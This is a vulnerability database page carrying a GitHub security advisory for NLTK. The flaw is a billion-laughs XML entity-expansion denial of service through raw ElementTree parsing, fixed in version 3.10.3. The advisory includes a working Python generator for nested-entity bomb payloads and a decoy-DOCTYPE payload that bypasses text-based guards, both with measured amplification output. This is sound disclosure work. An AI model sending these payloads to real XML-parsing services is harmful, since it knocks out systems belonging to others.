GCVE Workshop - 22 September 2026 (14:00-18:00), Luxembourg Before The Vulnopticon Conference - Registration

GHSA-97QJ-X29F-37W7

Vulnerability from github – Published: 2026-09-08 16:42 – Updated: 2026-09-08 16:42
VLAI
Summary
NLTK: Entity-expansion DoS (billion laughs) via remaining raw ElementTree parses
Details

Several XML parsing sites in NLTK still used xml.etree.ElementTree directly, which honours <!ENTITY> declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (<= 3.10.2): - nltk.chunk.named_entity.load_ace_file — parses ACE annotation XML - nltk.internals.ElementWrapper — converts any given string to an Element - nltk.downloaderPackage.fromxml, Collection.fromxml, _find_collections, _find_packages

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new nltk.xmlsec module that refuses entity declarations, preferring defusedxml and falling back to a standard-library xml.parsers.expat pre-scan when defusedxml is absent.


Attack demonstration

Reproducible PoC against a real affected entry point (nltk.internals.ElementWrapper). Every number below is captured output, not illustrative.

1. The amplification (vulnerable path: raw xml.etree.ElementTree)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

levels input bytes expanded bytes factor
3 218 10,000 x45
4 274 100,000 x364
5 330 1,000,000 x3,030
6 386 (libexpat 2.7.1 cap trips) -

The level-6 cap is libexpat's, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'<!ENTITY e{i} "{("&e%d;"%(i-1))*10}">' for i in range(1, levels+1))
    return f'<!DOCTYPE d [<!ENTITY e0 "AAAAAAAAAA">{d}]><d>&e{levels};</d>'
ET.fromstring(bomb(5))   # -> element whose .text is 1,000,000 chars

2. The patched entry point rejects it

>>> from nltk.internals import ElementWrapper
>>> ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)

3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy <!DOCTYPE> in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

evil = '<!-- <!DOCTYPE x [ ] > --><!DOCTYPE d [<!ENTITY a "PPPP...">]><d>&a;</d>'
raw ElementTree -> EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -> REJECTED (EntitiesForbidden)

An earlier draft of the fallback that walked the text was bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray ] inside a PI in the internal subset). All five are now regression tests.

4. Both back ends block it

nltk.xmlsec prefers defusedxml and falls back to a stdlib xml.parsers.expat pre-scan. Same payloads, defusedxml hidden to force the fallback:

stdlib fallback | billion-laughs               -> REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -> REJECTED (EntitiesForbidden)

Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.10.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-78681"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-09-08T16:42:18Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `\u003c!ENTITY\u003e` declarations in a document\u0027s internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.\n\nAffected call sites (\u003c= 3.10.2):\n- `nltk.chunk.named_entity.load_ace_file` \u2014 parses ACE annotation XML\n- `nltk.internals.ElementWrapper` \u2014 converts any given string to an Element\n- `nltk.downloader` \u2014 `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`\n\nlibexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.\n\nThis completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.\n\n---\n\n## Attack demonstration\n\nReproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.\n\n### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)\n\nA payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:\n\n| levels | input bytes | expanded bytes | factor |\n|--------|-------------|----------------|--------|\n| 3 | 218 | 10,000 | x45 |\n| 4 | 274 | 100,000 | x364 |\n| 5 | 330 | 1,000,000 | x3,030 |\n| 6 | 386 | (libexpat 2.7.1 cap trips) | - |\n\nThe level-6 cap is **libexpat\u0027s**, not NLTK\u0027s: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold \u2014 up to ~1 MB per parse here \u2014 expansion always succeeds.\n\n```python\nimport xml.etree.ElementTree as ET\ndef bomb(levels):\n    d = \"\\n\".join(f\u0027\u003c!ENTITY e{i} \"{(\"\u0026e%d;\"%(i-1))*10}\"\u003e\u0027 for i in range(1, levels+1))\n    return f\u0027\u003c!DOCTYPE d [\u003c!ENTITY e0 \"AAAAAAAAAA\"\u003e{d}]\u003e\u003cd\u003e\u0026e{levels};\u003c/d\u003e\u0027\nET.fromstring(bomb(5))   # -\u003e element whose .text is 1,000,000 chars\n```\n\n### 2. The patched entry point rejects it\n\n```\n\u003e\u003e\u003e from nltk.internals import ElementWrapper\n\u003e\u003e\u003e ElementWrapper(bomb(5))\nEntitiesForbidden: EntitiesForbidden(name=\u0027e0\u0027, ...)\n```\n\n### 3. Why a text-based screen is not enough\n\nAn entity declaration can hide behind a decoy `\u003c!DOCTYPE\u003e` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:\n\n```python\nevil = \u0027\u003c!-- \u003c!DOCTYPE x [ ] \u003e --\u003e\u003c!DOCTYPE d [\u003c!ENTITY a \"PPPP...\"\u003e]\u003e\u003cd\u003e\u0026a;\u003c/d\u003e\u0027\n```\n\n```\nraw ElementTree -\u003e EXPANDS (\u0027PPPPPPPPPPPP...\u0027, 40 chars)\nnltk.xmlsec     -\u003e REJECTED (EntitiesForbidden)\n```\n\nAn earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.\n\n### 4. Both back ends block it\n\n`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:\n\n```\nstdlib fallback | billion-laughs               -\u003e REJECTED (EntitiesForbidden)\nstdlib fallback | comment-decoy differential   -\u003e REJECTED (EntitiesForbidden)\n```\n\nEnvironment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK\u0027s floor).",
  "id": "GHSA-97qj-x29f-37w7",
  "modified": "2026-09-08T16:42:18Z",
  "published": "2026-09-08T16:42:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/security/advisories/GHSA-97qj-x29f-37w7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78681"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/commit/e91789c9a043296ad04912ce171c22776d45963b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/releases/tag/v3.10.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/nltk/PYSEC-2026-3748.yaml"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/nltk-before-entity-expansion-dos-via-elementtree"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "NLTK: Entity-expansion DoS (billion laughs) via remaining raw ElementTree parses"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…

Loading…